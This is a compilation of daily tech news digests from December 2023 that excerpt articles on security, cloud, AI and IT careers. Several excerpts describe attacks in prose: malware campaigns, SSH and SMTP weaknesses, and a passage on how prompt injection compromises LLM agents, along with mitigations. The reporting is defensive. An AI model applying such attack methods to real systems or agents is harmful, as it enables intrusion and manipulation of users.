Daily Tech Digest - December 22, 2023

Healthcare Organisations Embrace New Technologies to Fortify Cyber Defences

Healthcare organisations have initiated partnership with others to develop security operations centres to monitor their traffic and identify threats. Proactive programs like threat hunting and brand monitoring have also been preferred. ... These initiatives are being taken keeping in mind the requirements from CERT-IN to report cyber incidents within six hours, and new requirements under Digital Personal Data protection Act, 2023, which require the organisation to take measures to identify sources of data, take consent and manage the use and eventual destruction of data as per the guidelines given by the government. “Investments in advanced IAM technologies are becoming paramount, encompassing robust authentication methods, privileged access controls, and continuous monitoring of user activities,” says Pramod Bhaskar, CISO, Cross Identity. These measures align closely with regulatory changes and compliance requirements, as regulations like HIPAA increasingly emphasise the importance of secure user authentication, access governance, and audit trails in safeguarding patient information.


The Window of Exposure: A Critical Component of Your Cybersecurity Strategy

The goal of any responsible security professional is to reduce the window of exposure as much as possible. There are two basic approaches to this: limiting the amount of vulnerability information available to the public and reducing the window of exposure in time by issuing patches quickly. Limiting the amount of vulnerability information available to the public might work in theory, but it is impossible to enforce in practice. There is a continuous stream of research in security vulnerabilities, and most of this research results in public announcements. Hackers write new attack exploits all the time, and the exploits quickly end up in the hands of malicious attackers. While some researchers might choose not to publish a vulnerability they discover, public dissemination of vulnerability information is the norm because it is the best way to improve security. Reducing the window of exposure in time by issuing patches quickly is the other approach. Full-disclosure proponents publish vulnerabilities far and wide to spur vendors to patch faster. 


MLflow vulnerability enables remote machine learning model theft and poisoning

Many developers believe that services bound to localhost — a computer’s internal hostname — cannot be targeted from the internet. However, this is an incorrect assumption according to Joseph Beeton, a senior application security researcher at Contrast Security, who recently held a talk on attacking developer environments through localhost services at the DefCamp security conference. Beeton recently found serious vulnerabilities in the Quarkus Java framework and MLflow that allow remote attackers to exploit features in the development interfaces or APIs exposed by those applications locally. The attacks would only require the computer user to visit an attacker-controlled website in their browser or a legitimate site where the attacker managed to place specifically crafted ads. Drive-by attacks have been around for many years, but they are powerful when combined with a cross-site request forgery (CSRF) vulnerability in an application. In the past hackers used drive-by attacks through malicious ads placed on websites to hijack the DNS settings of users’ home routers.


Chameleon Android Trojan Offers Biometric Bypass

The variant includes several new features that make it even more dangerous to Android users that its previous incarnation, including a new ability to interrupt the biometric operations of the targeted device, the researchers said. By unlocking biometric access (facial recognition or fingerprint scans, for example), attackers can access PINs, passwords, or graphical keys through keylogging functionalities, as well as unlock devices using previously stolen PINs or passwords. "This functionality to effectively bypass biometric security measures is a concerning development in the landscape of mobile malware," according to Threat Fabric's analysis. ... The malware's key new ability to disable biometric security on the device is enabled by issuing the command "interrupt_biometric," which executes the "InterruptBiometric" method. The method uses Android's KeyguardManager API and AccessibilityEvent to assess the device screen and keyguard status, evaluating the state of the latter in terms of various locking mechanisms, such as pattern, PIN, or password.


The Rise of AI-Powered Applications: Large Language Models in Modern Business

AI and LLMs have fundamentally altered how people and organizations interact with technology. While they drive innovation and automation across multiple sectors simultaneously, they also change how professionals make decisions and communicate with customers. They have redefined industry-specific domains while enhancing industrial growth and innovation potential. With further development and research, it is only a matter of time before these AI-driven models can replicate the qualities of human speech and interaction. There is no certainty as to the extent of AI developments and capabilities. While the potential for innovation and development seems endless, AI’s rapid growth in business and industry proves that developers have only reached the tip of the iceberg. As AI functionalities become faster and more proficient, the healthcare, education, and financial service industries will thrive further and deliver trustworthy, reliable care and services for patients, students, and customers worldwide. Because LLMs offer operational support in data and analytics, there will be cost savings as professionals transfer their time and efforts elsewhere. 


NIST Seeks Public Comment on Guidance for Trustworthy AI

This is the first time there has been an "affirmative requirement" for companies developing foundational models that pose a serious risk to national security, economic security, public health or safety to notify the federal government when training their models, and to share the results of red team safety tests, said Lisa Sotto, partner at Hunton Andrews Kurth and chair of the company's global privacy and cybersecurity practice. This will have a "profound" impact on the development of AI models in the United States, she told Information Security Media Group. While NIST does not directly regulate AI, it helps develop frameworks, standards, research and resources that play a significant role in informing the regulation and the technology's responsible use and development. Its artificial intelligence risk management framework released earlier this year seeks to provide a comprehensive framework for managing risks associated with AI technologies. Its recent report on bias in AI algorithms seeks to help organizations develop potential mitigation strategies, and the Trustworthy and Responsible AI Resource Center, launched in March, is a central repository for information about NIST's AI activities.


Why laptops and other edge devices are being AI-enabled

You can run them in the cloud, but as well as the inevitable latency this involves, it’s also increasingly costly both in terms of network bandwidth and cloud compute costs. There’s also the governance issue of sending all that potentially-sensitive and bulky data to and fro. So at the very least, doing a first-cut and filter to reduce and/or sanitise the transmitted data volume, is valuable in all sorts of ways. You could use the GPU or even the CPU to do this filtering, and indeed that’s what some edge devices will be doing today. Alternatively you could simply run the inferencing work on the local CPU or GPU in your laptop or desktop. That works, but it’s slower. Not only can dedicated AI hardware such as an NPU do the job much faster, it will also be much more power-efficient. GPUs and CPUs doing this sort of work tend to run very hot, as evidenced by the big heatsinks and fans on high-end GPUs. That power-efficiency is useful in a desktop machine, but is much more valuable when you’re running an ultraportable on battery, yet you still want AI-enhanced videoconferencing, speedy photo editing, or smoother gaming and AR.


Future of wireless technology: Key predictions for 2024

New IoT technology will help unify connectivity across multiple home devices, transforming home users’ experience with IoT devices. Matter— a new industry standard launched in 2023 provides reliable, secure connectivity across multiple device manufacturers. Given the weight of players involved (e.g., Apple, Amazon, Google, Samsung SmartThings), we expect the adoption of Matter-certified products will be exponential in the next three years, validating Wi-Fi’s central role in the smart connected home and buildings. Pilot projects and trials of TIP Open Wi-Fi will proliferate in developing countries and price-sensitive markets due to its cost-effectiveness and the benefits offered by an open disaggregated model. Well-established wireless local-area network (WLAN) vendors will continue working to make themselves more cost-effective in these markets through massive investment in machine learning and AI and an integrated Wi-Fi + 5G offering to enterprises. Augmented and virtual reality will gain a larger share of our daily lives at home and work


What developers trying out Google Gemini should know about their data

Google told ZDNET that it uses the API inputs and outputs to improve product quality. "Human review is a necessary step of the model improvement process," a spokesperson said. "Through review and annotation, trained reviewers help enable quality improvements of generative machine-learning models like the ones that power Google AI Studio and the Gemini Pro via the Gemini API." To protect developers' privacy, Google said their data is de-identified and disassociated from their API key and Google account, which is needed to log in to Google AI Studio. This protection takes place done before the reviewers can see or annotate the data. Google's Terms of Service (ToS) for its generative AI APIs further states that the data is used to "tune models" and may be retained in connection to the user's tuned models "[for] re-tuning when supported models change". The ToS states: "When you delete a tuned model, the related tuning data is also deleted." The terms also state that users should not submit sensitive, confidential, or personal data to the AI models.


14 in-demand cloud roles companies are hiring for

As cloud computing grows increasingly complex, cloud architects have become a vital role for organizations to navigate the implementation, migration, and maintenance of cloud environments. These IT pros can also help organizations avoid potential risks around cloud security, while ensuring a smooth transition to the cloud across the company. With 65% of IT decision-makers choosing cloud-based services by default when upgrading technology, cloud architects will only become more important for enterprise success. ... DevOps focuses on blending IT operations with the development process to improve IT systems and act as a go-between in maintaining the flow of communication between coding and engineering teams. It’s a role that focuses on the deployment of automated applications, maintenance of IT and cloud infrastructure ... Security architects are responsible for building, designing, and implementing security solutions in the organization to keep IT infrastructure secure. For security architects working in a cloud environment, the focus is on designing and implementing security solutions that protect the business’ cloud-based infrastructure, data, and applications.



Quote for the day:

"The meaning of life is to find your gift. The purpose of life is to give it away." -- Anonymous

Daily Tech Digest - December 21, 2023

The New HR Playbook: Catalyze Innovation With Analytics And AI

Metaverse and blockchain technologies — underpinned by data and AI — also offer a lot of possibilities for improving HR practices. The metaverse, a shared virtual space bridging physical and digital realities, offers avenues for remote workspaces and virtual collaboration. It can enhance recruitment, onboarding, training, and development processes by providing immersive and interactive experiences that engage candidates and employees on a new level. The metaverse could also help companies with decentralized teams cultivate a strong organizational culture by giving employees a shared virtual space for interaction and engagement. Blockchain technology offers transparency and security that can have profound implications for HR processes. HR departments can use blockchain to improve the security of record-keeping, verify employee credentials, and simplify benefits administration. Blockchain can also streamline payroll processes, especially for international employees. Companies can even use blockchain to create decentralized, employee-driven platforms for collaboration and communication.


Why 2024 will be the year of the CISO

As the ESG/ISSA research indicates, many fed-up CISOs will retire, while others will move on to become virtual CISOs (vCISOs) or take field CISO positions with security technology vendors. We'll read numerous stories next year about CISOs up and quitting on the spur of the moment. While the reasons won't be disclosed, you can bet they are among those cited above. Competition for qualified candidates will be fierce. On a side note, I don't believe there is a significant population of next-generation CISO candidates with the right experience to step up. In 2024, we will augment our general discussion of the global cybersecurity skills shortage with a specific addendum about the CISO shortage. CISO pay and compensation will rise precipitously. Aside from a handful of $1 million positions, CISOs aren't paid nearly as much as one might assume. Salary.com calculates a median salary of about $241,000 with 90% of CISOs making $302,000 or less. Given the job requirements (long hours, stress, being on-call, etc.), this isn't very much. With the competition for candidates, firms will greatly increase base pay, perks, and bonuses, leading to hyper CISO salary inflation.


Hot Jobs in AI/Data Science for 2024

“The new and highly specialized role known as the ‘LLM Engineer’ is primarily found within organizations that have reached an advanced stage in their AI journey, having conducted numerous experiments but now facing challenges in the operationalization of their AI models at scale,” says Kjell Carlsson, head of data science strategy and evangelism at Domino Data Lab. ... “Some of the most sought-after AI positions today include machine learning engineer, AI engineer, and AI architect,” says Shmuel Fink, Chair Master of Science in data analytics, Touro University Graduate School of Technology. “Nevertheless, several other AI roles are also gaining prominence, such as AI ethicist, AI product manager, AI researcher, computer vision engineer, robotics engineer, and AI safety engineer. Moreover, there are positions that require industry-specific expertise, like a healthcare AI engineer.” But back at the ranch, employees in any job role will become more valuable if they possess AI skills. As they gain those skills, some specialized job roles will evolve while others disappear.


How Blockchain Will Change Organizations

The fact that blockchain is a distributed database means it is very difficult to delete data. Once something has been recorded on the blockchain, it becomes part of the permanent record. This traceability of data is another key advantage of blockchain technology. The data stored on a blockchain is immutable, meaning that it cannot be changed or deleted. This traceability can be useful for tracking the provenance of goods and tracing the origins of data. It also has implications for compliance, as organizations will be able to show exactly what data they have and where it came from. ... Under the traditional centralized model, organizations have complete control over the data they store. However, individuals have full control over their data with blockchain technology. This is because each user has a private key, which is used to access their data. Individuals have complete control over their data, which is a key advantage of blockchain technology. It means that users can be sure that their data is safe and secure and that they can share it with whomever they choose.


Industry Impact: Celebrating IT's Milestones and Achievements This Year

The integration of AI into various solutions, including observability, IT service management, and database solutions, has allowed for greater automation of the mundane tasks that often bog down IT pros and hinder organizations from accelerating their digital transformations. AI-powered capabilities free up valuable time for IT pros, allowing them to focus on the most important tasks at hand. Autonomous operations, enabled by purpose-built models for IT operations and large language models, are poised to revolutionize IT environments in the coming years, reducing operation costs and bettering the lives of those in the tech workforce. ... The IT industry has a smorgasbord of accomplishments that have enriched the digital lives of organizations this year. The industry’s cloud migration journey, in particular, has played a central role in allowing organizations to scale their operations and pivot rapidly in response to market conditions. The cloud journey has transformed the way businesses operate, offering scalability, flexibility, and cost-efficiency. 


An IT Carol: How the Ghosts of IT Past and Present Can Help Improve the Future

You see yourself sitting at your desk, frantically trying to juggle more service desk tickets than you ever thought were possible. The trip to the future also shows the vast number of new complex systems that teams are using. As applications, networks, databases, and infrastructures grew in complexity, so did the tools and solutions we need to manage them. This has created a future where IT pros are trying to navigate and manage some of the most complex systems and environments imaginable. Teams are more overworked than ever before. You spend so much time fighting fires that you have no time to build better technology that provides important new capabilities. You have almost no time to think about anything else, let alone spend the holiday with family or friends. Thankfully, this is not a future that has to be, but rather one we can avoid if we take the right steps today. Right now, we are on the path to improving the lives of IT teams through the integration of artificial intelligence (AI). IT solutions powered by AI, such as observability and ITSM, can help manage the complex IT environments we are witnessing through ongoing digital transformation and the move to the cloud.


Why data, AI, and regulations top the threat list for 2024

Some of the essential questions security teams ought to be asking themselves include: How do we manage and safeguard aspects like confidentiality, integrity, and availability of data? What strategies can we employ to protect our data against cyber threats and misuse? How do we address the security challenges that emerge with expanding data repositories? How do we differentiate between valuable data and redundant information? Furthermore, there’s often a misalignment in how data is structured versus the business framework. Consequently, security teams may need to engage in discussions with business units to clarify issues such as how we are applying our data. With whom is this data being shared? ... Although AI technologies aren’t new, the recent widespread adoption of AI has introduced a myriad of business and security challenges for organizations. Key questions to consider include: How do we monitor AI usage within the organization? How do we regulate the data shared with AI systems by employees? How do we ensure ongoing compliance with ethical standards and legal requirements?


2023 - The year of transformation and harmonisation

Millennial leaders bring a distinctively dynamic, digitalised approach to their roles, characterised by agility, openness, proactiveness, and hands-on engagement. Their adeptness in navigating the digital landscape seamlessly allows them to forge strong connections within their predominantly Gen Z and millennial workforce. This workforce, in turn, embodies an informed, forward-looking, and tech-savvy ethos, driven by cutting-edge technologies that facilitate smart and efficient work practices. In the world of leading-edge technologies, the arrival of Chat GPT by OpenAI in the preceding November continued to take centre stage. Throughout the year, there was a surge in competition and discussions surrounding AI, particularly generative AI, which gained momentum. Amidst these discussions, Google's introduction of Bard added fervour to the debate, igniting intense conversations about the potential impact of generative AI on employment and the perceived threat to various job roles. This stirred a pot of mixed emotions—feelings of anxiety, uncertainty, and ambiguity swirled within the tech sphere.


Small businesses lead the way, while larger industries lag in tech adoption

On the other hand, many leaders in the small and mid-sized industrial sector are in the age group of 50 and above. When they initially embarked on their careers in the core industry, the adoption of IT and technology in their companies was significantly lower. Technology was not as pervasive, and IT integration was often considered an unnecessary expense. For those who did attempt computerisation in the early 2000s, the experience was often disheartening. Small IT companies that provided software solutions during that period often faced challenges and many even disappeared. The owners of these companies, faced with the uncertainty and challenges of running a technology-based business, opted for well-paying jobs instead. This experience left a lasting impact on their perception of technology and its role in business operations. Moreover, the proliferation of the internet and the rise of startups introduced a new paradigm. Many services and software were offered for free or at significantly reduced rates, fostering an expectation of inexpensive or cost-free technology solutions. This demotivated many software company owners from continuing in the business. 


What’s Ahead for AI In 2024: The Transformative Journey Continues

The coming year will see a shift in how generative AI is employed by businesses, with a greater emphasis on using organizational data. Companies are increasingly cautious about sharing sensitive data on public platforms, opting instead to host private foundation models within their four walls. This move is driven by concerns over data security and the desire to customize AI applications to specific organizational needs. By using their own data, companies can ensure that AI output is relevant and in context. This trend will lead to innovative applications of generative AI in a variety of business functions. ... New tuning techniques such as prompt tuning and retrieval augmented generation (RAG) will gain popularity next year. These methods provide more context-specific adjustments to AI models without the need for extensive retraining. Prompt tuning, for example, uses smaller pre-trained models to encode text prompts; RAG combines specific information with prompts to enhance the relevance of the model's output.



Quote for the day:

"People who avoid failure also avoid success.” -- Robert T. Kiyosaki

Daily Tech Digest - December 20, 2023

OpenAI announces ‘Preparedness Framework’ to track and mitigate AI risks

The announcement from OpenAI comes in the wake of several major releases focused on AI safety from its chief rival, Anthropic, another leading AI lab that was founded by former OpenAI researchers. Anthropic, which is known for its secretive and selective approach, recently published its Responsible Scaling Policy, a framework that defines specific AI Safety Levels and corresponding protocols for developing and deploying AI models.The two frameworks differ significantly in their structure and methodology. Anthropic’s policy is more formal and prescriptive, directly tying safety measures to model capabilities and pausing development if safety cannot be demonstrated. OpenAI’s framework is more flexible and adaptive, setting general risk thresholds that trigger reviews rather than predefined levels. ... Experts say both frameworks have their merits and drawbacks, but Anthropic’s approach may have an edge in terms of incentivizing and enforcing safety standards. From our analysis, it appears Anthropic’s policy bakes safety into the development process, whereas OpenAI’s framework remains looser and more discretionary, leaving more room for human judgment and error.


Australian federal government opens consultation on mandatory ransomware reporting obligation for businesses

The government is looking to develop legislation to "encourage" businesses to voluntarily provide information to ASD and the Cyber Coordinator about a cyber incident under a limited basis that would prevent the agencies from using this information for compliance action against the reporting organizations. The idea is to give more information than current regulation requires so the agencies can provide better support when businesses are under attack and to mitigate harms to individuals arising from cyber security incidents. ... Home Affairs t is seeking input from industry on the design and implementation of a cyber incident review board (CIRB). It is proposed that the CIRB would conduct no-fault incident reviews to reflect on lessons learned from cyber incidents, and share these lessons learned with the Australian public. The paper stated that the CIRB would not be a law enforcement, intelligence or regulatory body. It would be allowed to request information related to a cyber incident but would not have powers to compel and organization to do so. 


US Lawmakers Urge Pushback on EU’s Big Tech Crackdown

CIOs, CISOs, and other IT leaders should keep a watchful eye on the EU's regulatory developments, Martha Heller, CEO at executive search firm Heller Search, tells InformationWeek. “The EU’s legislative move to curtail the power of US tech companies is a double-edge sword,” she says in an email interview. “Its mandate that the largest US-based tech companies give users more choice among services could give smaller technology companies a fighting chance. But its bias against US tech companies could limit the US’s ability to compete on the global market.” Heller adds, “As both producers and enterprise consumers of technology, CIOs and CTOs should pay close attention to the EU, as it leverages its watchdog position.” ... For CIOs, keeping track of regulatory considerations is not getting easier moving forward. “You have five big US tech companies that are primarily affected,” Chin-Rothmann says. “You must look at that in context with all of the other digital laws globally. It’s going to be a pretty complex regulatory patchwork. And when the EU regulates, other countries tend to follow suit.


Web injections are back on the rise: 40+ banks affected by new malware campaign

Our analysis indicates that in this new campaign, threat actors’ intention with the web injection module is likely to compromise popular banking applications and, once the malware is installed, intercept the users’ credentials in order to then access and likely monetize their banking information. Our data shows that threat actors purchased malicious domains in December 2022 and began executing their campaigns shortly after. Since early 2023, we’ve seen multiple sessions communicating with those domains, which remain active as of this blog’s publication. Upon examining the injection, we discovered that the JS script is targeting a specific page structure common across multiple banks. When the requested resource contains a certain keyword and a login button with a specific ID is present, new malicious content is injected. Credential theft is executed by adding event listeners to this button, with an option to steal a one-time password (OTP) token with it. This web injection doesn’t target banks with different login pages, but it does send data about the infected machine to the server and can easily be modified to target other banks.


New Malvertising Campaign Distributing PikaBot Disguised as Popular Software

The latest initial infection vector is a malicious Google ad for AnyDesk that, when clicked by a victim from the search results page, redirects to a fake website named anadesky.ovmv[.]net that points to a malicious MSI installer hosted on Dropbox. It's worth pointing out that the redirection to the bogus website only occurs after fingerprinting the request, and only if it's not originating from a virtual machine. "The threat actors are bypassing Google's security checks with a tracking URL via a legitimate marketing platform to redirect to their custom domain behind Cloudflare," Segura explained. "At this point, only clean IP addresses are forwarded to the next step." Interestingly, a second round of fingerprinting takes place when the victim clicks on the download button on the website, likely in an added attempt to ensure that it's not accessible in a virtualized environment. Malwarebytes said the attacks are reminiscent of previously identified malvertising chains employed to disseminate another loader malware known as FakeBat (aka EugenLoader).


SSH shaken, not stirred by Terrapin vulnerability

As the university trio put it this week, a successful Terrapin attack can "lead to using less secure client authentication algorithms and deactivating specific countermeasures against keystroke timing attacks in OpenSSH 9.5." In some very specific circumstances, it could be used to decrypt some secrets, such as a user's password or portions of it as they log in, but this is non-trivial and will pretty much fail in practicality. Let's get to the nitty gritty. We'll keep it simple; for the full details, see the paper. When an SSH client connects to an SSH server, before they've established a secure, encrypted channel, they will perform a handshake in which they exchange information about each other in plaintext. Each side has two sequence counters: one for received messages, and one for sent messages. Whenever a message is sent or received, the relevant sequence counter is incremented; the counters thus keep a running tally of the number of sent and received messages for each side. As a MITM attack, Terrapin involves injecting a plaintext 'ignore' message into the pre-secure connection, during the handshake, so that the client thinks it came from the server and increments its sequence counter for received messages. The message is otherwise ignored.


SMTP Smuggling Allows Spoofed Emails to Bypass Authentication Protocols

Using SMTP Smuggling, an attacker can send out a spoofed email purporting to come from a trusted domain and bypass the SPF, DKIM and DMARC email authentication mechanisms, which are specifically designed to prevent spoofing and its use in spam and phishing attacks. An analysis found that the attack technique could allow an attacker to send emails spoofing millions of domains, including ones belonging to high-profile brands such as Microsoft, Amazon, PayPal, eBay, GitHub, Outlook, Office365, Tesla, and Mastercard. The attack was demonstrated by sending spoofed emails apparently coming from the address ‘admin(at)outlook.com’. However, attacks against these domains are possible — or were possible, because some vendors have applied patches — due to the way a handful of major email service providers set up SMTP servers. The vendors identified by the researchers are GMX (Ionos), Microsoft and Cisco. The findings were reported to these vendors in late July. GMX fixed the issue after roughly 10 days. Microsoft assigned it a ‘moderate severity’ rating and rolled out a patch sometime in the middle of October.


Digital Transformation: Composable Applications And Micro-Engagements

Composable applications are characterized by one simple concept. Organizations are evolving beyond the method of integrating low-level services, and they’re gravitating to consuming higher-level micro-engagements. Micro-engagements are defined as small, repeatable experiences that can be preconfigured and consumed within a larger environment. Organizations are questioning why they need to re-create the wheel (or in this instance, the experience) using low-level services. Why can’t they simply leverage commonly repeatable experiences and lower their overall technical debt while increasing overall agility? ... Once embraced, organizations adopting the composable application mindset will be biased toward vendors who provide use cases or process-specific micro-engagements. Out-of-the-box micro-engagements can be quickly and easily discovered, evaluated, integrated, branded and deployed with minimal effort and risk, and vendors that provide no-code platforms can enable organizations to quickly and easily create their own reusable micro-engagements.


CISO: Your Tech Security Guide

Every business, regardless of size, necessitates a security leader overseeing technology, information, and data security, even if not designated as a CISO. While midsize and larger enterprises commonly appoint a CISO within their C-suite, smaller businesses may delegate such responsibilities to a tech executive like a director of cybersecurity. Some smaller or startup enterprises opt to outsource the CISO role, enhancing protection for their intellectual property, data, and IT infrastructure. ... A CISO’s contribution lies in their comprehensive understanding of security, connecting various security facets with the organization’s IT systems and networks. They leverage this perspective to pinpoint security risks and devise effective management strategies. Successful CISOs adeptly articulate complex security issues in layman’s terms, enabling leadership to grasp the implications. ... Becoming a CISO involves understanding cybersecurity’s technical foundations alongside practical management principles, encompassing people, processes, and technology. Critical attributes include a fervor for information technology, commitment to ongoing learning, adept leadership, familiarity with security standards, and relevant certifications (CISSP, CISM).


Is Your Product Manager Hurting Platform Engineering?

Having a product manager from day one can lower oxygen levels for your platform team. Feedback may be filtered, delayed or misunderstood, massively reducing its value and making good outcomes less likely. Platform engineers should bathe in the full, grainy details of the feedback and use it to enrich their understanding of the tasks their customers are trying to complete — and where they are underserviced when completing those jobs. This helps the platform team create innovative solutions that may solve multiple unmet needs. You don’t have to use the Jobs To Be Done (JTBD) framework here. The crucial detail is that by immersing yourself in the customer’s needs, you can come up with ideas that solve many pain points instead of falling into the feature-factory trap of solving problem after problem. ... While it’s tempting to think ahead to what happens when your platform has achieved total adoption, been spun into a subsidiary organization, and had a conference named after it, it’s worth understanding that scale is not why you’ll add a product manager.



Quote for the day:

"Effective team leaders adjust their style to provide what the group can't provide for itself." -- Kenneth Blanchard

Daily Tech Digest - December 19, 2023

7 Security Trends to Watch Heading into 2024

Cyberattacks led by nation-state threat actors, as well as politically motivated hacktivist groups, will continue in relation to the active conflicts in Ukraine and Gaza. Vanderlee points out that attacks in these regions may have a higher likelihood of kinetic impact. For example, Sandworm, a threat actor linked with Russia, disrupted the power in Ukraine and caused a power outage in late 2022. “Those are definitely things to watch out for, particularly if you do business in those regions or in countries situated around those regions,” says Vanderlee. ... Cloud migration continues to be a significant theme in the IT space. As more organizations embrace a cloud-first approach, threat actors are looking for ways to target hybrid and multi-cloud environments. Mandiant observed threat actors targeting cloud environments and seeking ways to gain persistence and move laterally in 2023, according to Google Cloud’s Cybersecurity Forecast 2024. That trend is likely to bleed over into 2024; threat actors are going to look for ways to exploit cloud misconfigurations and move laterally across multi-cloud environments.


Internet's deep-level architects slam US, UK, Europe for pushing device-side scanning

Client-side scanning has since reappeared, this time on legislative agendas. And the IAB – a research committee for the Internet Engineering Task Force (IETF), a crucial group of techies who help keep the 'net glued together –thinks that's a bad idea. "A secure, resilient, and interoperable internet benefits the public interest and supports human rights to privacy and freedom of opinion and expression," the IAB declared in a statement just before the weekend. "This is endangered by technologies, such as recent proposals for client-side scanning, that mandate unrestricted access to private content and therefore undermine end-to-end encryption and bear the risk to become a widespread facilitator of surveillance and censorship." ... For the IAB and IETF, client-side scanning initiatives echo other problematic technology proposals – including wiretaps, cryptographic backdoors, and pervasive monitoring. "The IAB opposes technologies that foster surveillance as they weaken the user's expectations of private communication which decreases the trust in the internet as the core communication platform of today's society," the organization wrote. 


Zombie Scrum First Aid

Zombie Scrum is on the rise! What may look like Scrum from a distance often turns out to be anything, but when you take a closer look. Although teams go through the motions of Scrum, Sprints don’t result in valuable outcomes, customers are not involved, teams have little autonomy, and nobody is doing anything to improve. The first response to Zombie Scrum might be to panic, run around, and hide below your desk. That doesn’t usually work. So, for our book, the Zombie Scrum Survival Guide, we created a simple poster that tells you exactly what to do in clear and simple language. ... Complaints, cynicism, and sarcasm don’t help anyone. It may even contribute to teams sliding further into Zombie Scrum. Instead, highlight what works well, where improvements occur, and what is possible when you work together. Use humor to lighten the mood, but not sugarcoat the truth. Facilitate the next Sprint Retrospective with the Liberating Structure ‘Appreciative Interviews’. It helps identify enablers for success in less than one hour. By starting from what goes well — instead of what doesn’t — AI liberates spontaneous momentum and insights for positive change as “hidden” success stories are uncovered. 


On-prem vs cloud storage: Four decisions about data location

For the best performance, system architects need to minimise latency between applications and storage. To access cloud storage via the public internet inevitably increases latency. Internet connections are also more prone to variable performance and general reliability issues. This suggests that for best performance, data should be stored on-premise. For the most critical applications, this is still usually the case. But the decision is not always clear cut. “We know that if you start to run compute on a storage bucket across the wire, you are going to have a performance impact,” cautions Paul Mackay, regional vice-president for EMEA and APAC at cloud data firm Cloudera. ... Even so, optimised on-premise storage can still be the cheaper option. As PA’s Gupta points out, much depends on how new the customer’s on-site infrastructure is, and how much life it has left. Cloud storage also has hidden costs. Data egress is frequently cited as a reason for higher than expected bills, but firms can also find they pay more than expected because they store data for extended periods in expensive tiers rather than dedicated cloud archives. Again, careful application design and a clear picture of data use will minimise this.


Parallels Between Open Source and Fully Remote Team Setups

In open source and remote work, digital communication is the vital link uniting individuals, fostering collaboration and understanding. Beyond information transfer, it builds relationships and transcends cultural differences. Contributors in open source projects require effective digital communication for diverse backgrounds. Platforms like GitHub offer not just code repositories but crucial discussion spaces. Remote work tools like Slack and Zoom create a virtual office, addressing the challenge of sustaining connections. Clarity counters miscommunication, while video meetings provide a personal touch, supporting empathetic communication. Inclusive digital communication ensures accessibility, involving all contributors. ... Open source communities epitomize meritocracies, fostering diversity and innovation by evaluating contributions solely on merit. In remote work, meritocracy shifts the emphasis from productivity to quality and impact, allowing introverted individuals to shine based on tangible outputs, fostering an objective assessment. While offering advantages, challenges include potential “echo chamber” effects and the risk of overlooking diverse contributions. 


The impact of prompt injection in LLM agents

Addressing prompt injection in LLMs presents a distinct set of challenges compared to traditional vulnerabilities like SQL injections. In these types of scenarios, the structured nature of the language allows for parsing and interpretation into a syntax tree, making it possible to differentiate between the core query (code) and user-provided data, and enabling solutions like parameterized queries to handle user input safely. In contrast, LLMs operate on natural language, where everything is essentially user input with no parsing into syntax trees or clear separation of instructions from data. This absence of a structured format makes LLMs inherently susceptible to injection, as they cannot easily discern between legitimate prompts and malicious inputs. Any defensive and mitigation strategies should be created with the assumption that attackers will eventually be able to inject prompts successfully. Firstly, enforcing stringent privilege controls ensures LLMs can access only the essentials, minimizing potential breach points. We should also incorporate human oversight for critical operations to add a layer of validation to safeguard against unintended LLM actions


Navigating cloud concentration and AI lock-in

Although you can choose to reduce the use of a specific cloud provider, it is sometimes nearly impossible to move some applications to other platforms. This is due to the coupling of those applications to the cloud platform and the economic inability to get them off those platforms. To guard against the risks associated with cloud concentration and AI lock-in, IT leaders are exploring strategies to reduce dependency on a single cloud provider. This can include leveraging single-tenant cloud solutions, colocation companies, and hybrid cloud strategies to diversify their cloud deployment and infrastructure. As IT leaders navigate the complex landscape of cloud concentration risks and AI lock-in, it is evident that an agile approach to cloud strategy and AI adoption is mandatory. Organizations can mitigate risks by understanding the nuanced considerations of vendor selection, fostering a multicloud approach, and embracing innovative technologies. At the end of the day, keep your eyes open for the fully optimized solution, and do not focus on just a single cloud provider’s services, including AI.


Will Putting a Dollar Value on Vulnerabilities Help Prioritize Them?

Whether the focus on impact makes VISS any more valuable than other scoring systems is a matter of debate. Any scoring systems should not just replicate what others are already doing, and VISS seems to try to cover some new ground — at least in terms of scope, says Brian Martin, vulnerability historian at Flashpoint, a threat intelligence firm. "Do we need another scoring system? No, but kind of yes," he says. "On one hand, we have too many SSes. We have CVSS version 2, version 3, version 4, we have EPSS, we have the ransomware prediction scoring system — So I'm skeptical, but if it is more direct and to be utilized for a single purpose, such as bug bounties, then I can see it being beneficial." However, companies should not expect prioritizing vulnerabilities using VISS to be any easier than it is with other systems. While VISS may be simpler to calculate, it still requires knowledgeable answers to assign the right level of risk to vulnerabilities, says Tim Jarrett ... "Scoring models are not are not silver bullets," he says. "You actually have to adopt them and use them and feed them. And I think that what this does not do is make the problem of prioritizing vulnerabilities any less labor intensive."


9 tips for achieving IT service delivery excellence

To achieve maximum efficiency, Cziomer also suggests focusing service efforts on DevOps Research and Assessment (DORA) metrics, such as “lead time for change” and “time to restore service.” Customer-centric Net Promoter Scores are equally important, he adds. “To dive deeper into understanding our services, I employ methods like value stream mapping to pinpoint bottlenecks or inefficiencies,” says Cziomer, who feels that proactive approaches such as these enable IT organizations to consistently elevate their service levels. ... Effective IT service delivery begins by creating and standardizing processes and documentation, says Patrick Cannon, field CTO at data center and cloud services firm US Signal. Standardization ensures a consistent end-user experience with outcomes that adhere to established security policies. “It’s also beneficial for effective training and new IT staff onboarding,” he says, adding that when IT understands the needs of each business unit, it opens the way to a more proactive service approach, reducing downtime and fostering innovation.


Architecting for Resilience: Strategies for Fault-Tolerant Systems

A fault-tolerant system can keep working properly even when things go wrong. Faults are any issues that make a system behave differently than expected. Faults can be caused by hardware failure, software bugs, human errors, or environmental factors like power outages. And in complex systems with a lot of services and sub-services, hundreds of servers, and distributed in different Data Centers minor issues happen all the time. ... Testing plays a key role in building resilient, fault-tolerant systems. Testing helps identify and address potential weaknesses before they cause real failures or outages. There are various testing methods focused on resilience, including chaos engineering, stress testing, and load testing. These techniques simulate realistic failure scenarios like hardware crashes, traffic spikes, or database overloads. The goal is to observe how the system responds and find ways to improve fault tolerance. Testing validates whether redundancy, failover, replication, and other strategies work as intended. All big IT companies practice resilience testing. And Netflix is leading here. 



Quote for the day:

"Perhaps the ultimate test of a leader is not what you are able to do in the here and now - but instead what continues to grow long after you're gone" -- Tom Rath

Daily Tech Digest - December 18, 2023

How to Select the Right Industry Cloud for Your Business

